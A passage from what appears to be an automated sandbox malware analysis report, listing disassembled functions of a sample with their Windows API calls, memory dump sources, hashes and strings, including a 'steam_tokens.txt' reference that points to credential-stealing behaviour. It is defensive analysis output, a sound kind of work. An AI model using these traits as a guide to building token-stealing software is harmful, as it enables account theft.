                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 0544b00c57766eb85e71c39cac1d5b979529100f7f9c3f5290a217a0120bf88d
                                  • Instruction ID: 416bbd7ae393bfa13d4a89fd49e1f972ac8c542ab0589f8c36cf14d0f8954ef1
                                  • Opcode Fuzzy Hash: 0544b00c57766eb85e71c39cac1d5b979529100f7f9c3f5290a217a0120bf88d
                                  • Instruction Fuzzy Hash: 8D418971910119ABCB26EF64EC46EEE77B4BF58300F404454FA1AAF250DE70AF889F60
                                  Function 0035ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035ECDF
                                  • lstrlen.KERNEL32(00000000), ref: 0035ECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ED1D
                                  • lstrlen.KERNEL32(00000000), ref: 0035ED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0035ED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: 3783a6a60b90051c3aba31e933fc4ac834b7a8eae2c6a3da41522aad31b8fe52
                                  • Instruction ID: 45a4fba214f4aa6d8e068c4584f5a5e91b919f8d0fadcaebb5c62cc7a74efa2e
                                  • Opcode Fuzzy Hash: 3783a6a60b90051c3aba31e933fc4ac834b7a8eae2c6a3da41522aad31b8fe52
                                  • Instruction Fuzzy Hash: 23315C31A105155BC723BB78EC4A96F7BE8AF14301F855060FC49AF322DF20ED2987A1
                                  Function 00349A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0034140E), ref: 00349A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0034140E), ref: 00349AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,0034140E), ref: 00349AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,0034140E,00000000,?,?,?,0034140E), ref: 00349AE0
                                  • LocalFree.KERNEL32(?,?,?,?,0034140E), ref: 00349B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0034140E), ref: 00349B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 54eadf728114f74c32f82d8e23ddba5e63abbea2309e5f66dab7fdc5c8f5bb18
                                  • Instruction ID: aca5aefb6fb8b7dadab7ad69d688ed3a58c1a58515586422fc4b438b66de6a8f
                                  • Opcode Fuzzy Hash: 54eadf728114f74c32f82d8e23ddba5e63abbea2309e5f66dab7fdc5c8f5bb18
                                  • Instruction Fuzzy Hash: 9D115E71600209AFE711DFA9EC88FBB73BCEB14340F11015AF905AA280EB70AD54DBA1
                                  Function 00365AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365B14
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00365B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00365B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00365B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: f8f09782f2fc6bfac8b99718085d888b820170711e181793d211f0d30f49a557
                                  • Instruction ID: 147d8d43dcebe8742df508380dd52dae268105405ebb8c268e605c9ebd1dd4d5
                                  • Opcode Fuzzy Hash: f8f09782f2fc6bfac8b99718085d888b820170711e181793d211f0d30f49a557
                                  • Instruction Fuzzy Hash: 07417171B006199FCF19DF6CC895AAEBBB5EB88310F15C239E909EB348D630DD018B90
                                  Function 00357D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357D58
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1D5
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: 92f92ec803ddd33ce2068e63b03a448508254f2e0c377d07b17fa1e93bedf952
                                  • Instruction ID: 1fe3fd567a3e21a375ce5bf39c890c4990368a350a8ef978f840f31a096859fa
                                  • Opcode Fuzzy Hash: 92f92ec803ddd33ce2068e63b03a448508254f2e0c377d07b17fa1e93bedf952
                                  • Instruction Fuzzy Hash: 6021E9323147004BD722DE6CE881E3AF7F5EF91751B214A2EE8458B261D771DC0487A1
                                  Function 003633C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003633EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003633F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00363411
                                  • wsprintfA.USER32 ref: 00363437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: b529b30e42c140b203222eee39e4cf72b471e2fd1d4bc2162e60aac40cfc1293
                                  • Instruction ID: 95a0f3ff52a9551f3a9f9673bd86c1a6ba913cd4b989f04027cec0899d61c51f
                                  • Opcode Fuzzy Hash: b529b30e42c140b203222eee39e4cf72b471e2fd1d4bc2162e60aac40cfc1293
                                  • Instruction Fuzzy Hash: 4F0128B1E04204AFDB05DF98DC49FAEB7BCFB44710F004129F90AE7380DB7459008AA5
                                  Function 0035D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,00FAD530,00000000,00020119,?), ref: 0035D7F5
                                  • RegQueryValueExA.ADVAPI32(?,00FADCD0,00000000,00000000,00000000,000000FF), ref: 0035D819
                                  • RegCloseKey.ADVAPI32(?), ref: 0035D823
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035D848
                                  • lstrcat.KERNEL32(?,00FADEE0), ref: 0035D85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: e74f203b7e7fa242da875e8c61a2f7455d2a0fb087b7d307b1181f1525b257b8
                                  • Instruction ID: f7097cd269a007d80a6dfa46ce355bbaa1a05d7b9099192d7ae6e21c25be3b6f
                                  • Opcode Fuzzy Hash: e74f203b7e7fa242da875e8c61a2f7455d2a0fb087b7d307b1181f1525b257b8
                                  • Instruction Fuzzy Hash: 47415271A1010C9FCB55EF64EC86FEE77B8AB54304F404064B90D9B251EF30AAC99F91
                                  Function 00357EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00357F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00357F60
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00357FA5
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00357FD3
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00358007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: f34a1e4f70d3546b629cf30d79ab895194f72f9085d4368a5307e4071d86da96
                                  • Instruction ID: 72450ba5262f05336d667fcd3d1b17e90ca677cbcc483595f48acd78c4804065
                                  • Opcode Fuzzy Hash: f34a1e4f70d3546b629cf30d79ab895194f72f9085d4368a5307e4071d86da96
                                  • Instruction Fuzzy Hash: 47418330504116DFCB22DF68E884EAE77F8FF55301B114199E809DB361DB71AA69CB91
                                  Function 00358050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003580BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003580EA
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 00358102
                                  • lstrlen.KERNEL32(00000000), ref: 00358140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: dfcdf667650759bb1affea53030d44551a6c6606250fd77489ebb14add965d76
                                  • Instruction ID: f6e5433d9d22106f9609cbd909d5a0795a076f73b13f4d5a0f2dc39630e6edb8
                                  • Opcode Fuzzy Hash: dfcdf667650759bb1affea53030d44551a6c6606250fd77489ebb14add965d76
                                  • Instruction Fuzzy Hash: 64416175600506ABCB22DF78D944FABBBF4AF44711F11805CAC49E7254EF34EA59CB90
                                  Function 00363130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00363166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,00F9BC38,00000000,00020119,?), ref: 0036318C
                                  • RegQueryValueExA.ADVAPI32(?,00FAD3B0,00000000,00000000,00000000,000000FF), ref: 003631A7
                                  • RegCloseKey.ADVAPI32(?), ref: 003631B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 67aeab9576de84dd42f75c5724e2e4cf1c290e2c3ab045c8c4890d8ed3265e50
